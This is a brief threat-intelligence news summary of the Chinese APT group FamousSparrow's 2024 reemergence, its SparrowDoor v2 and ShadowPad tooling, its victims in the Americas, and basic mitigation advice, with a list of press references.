After a period of inactivity, the Chinese cyber espionage group FamousSparrow has reemerged with upgraded tools and tactics, targeting organizations across the United States, Mexico, and Honduras. According to research by ESET and industry reports, the group has compromised a U.S. financial-sector trade group, a Mexican research institute, and a Honduran government institution since mid-20241, 2. This resurgence highlights the persistent threat posed by state-aligned advanced persistent threat (APT) actors.
Reemergence and Updated Tactics
FamousSparrow, active since 2019 but dormant since 2022, has returned with two new variants of its signature SparrowDoor backdoor. The group exploited outdated Microsoft Exchange and Windows Server systems, likely leveraging ProxyLogon or similar vulnerabilities to deploy IIS web shells3. ESET researchers noted the use of ShadowPad malware, a tool previously associated with Chinese APT41, suggesting potential collaboration or shared tooling among Chinese threat actors4.
The group’s post-exploitation activities include remote PowerShell execution, file exfiltration, and lateral movement. Notably, their updated SparrowDoor v2 backdoor is modular and multi-threaded, with improved code architecture for stealth and persistence5.
Victimology and Historical Context
FamousSparrow initially gained notoriety for targeting hotels worldwide before shifting to governmental and financial targets. Recent victims include:
- A U.S. financial-sector trade group (breached June 2024)
- A Mexican research institute (July 2024)
- A Honduran government institution (compromised intermittently since 2022)
Microsoft previously linked the group to Salt Typhoon and GhostEmperor, but ESET asserts it operates as a distinct cluster with loose ties to other Chinese APTs6.
Mitigation and Detection
To defend against FamousSparrow’s tactics, organizations should:
- Patch Microsoft Exchange and Windows Server systems immediately.
- Monitor for anomalous IIS web shells and PowerShell activity.
- Restrict lateral movement through network segmentation.
ESET’s report provides additional detection rules and indicators of compromise (IOCs) for threat hunters7.
Conclusion
FamousSparrow’s resurgence underscores the evolving capabilities of Chinese cyber espionage groups. Their shift toward financial and governmental targets in the Americas suggests strategic objectives aligned with geopolitical interests. Proactive patching and monitoring remain critical to mitigating these threats.
References
- “Chinese APT Group FamousSparrow Resurfaces with Upgraded Cyber Arsenal,” Infosecurity Magazine, Mar. 26, 2025. [Online]. Available: https://www.infosecurity-magazine.com/news/chin-famoussparrow-targets-us/
- “China-linked FamousSparrow Targets US, Latin America,” The Record, Mar. 27, 2025. [Online]. Available: https://therecord.media/china-famous-sparrow-back-eset
- “You Will Always Remember This as the Day You Finally Caught FamousSparrow,” ESET Research, Mar. 27, 2025. [Online]. Available: https://www.welivesecurity.com/en/eset-research/you-will-always-remember-this-as-the-day-you-finally-caught-famoussparrow/
- “Chinese Hackers FamousSparrow Allegedly Target US Financial Firms,” TechRadar, Mar. 27, 2025. [Online]. Available: https://www.techradar.com/pro/security/chinese-hackers-famoussparrow-allegedly-target-us-financial-firms
- “China’s FamousSparrow APT Returns with ShadowPad Malware,” The Register, Mar. 27, 2025. [Online]. Available: https://www.theregister.com/2025/03/27/china_famoussparrow_back/
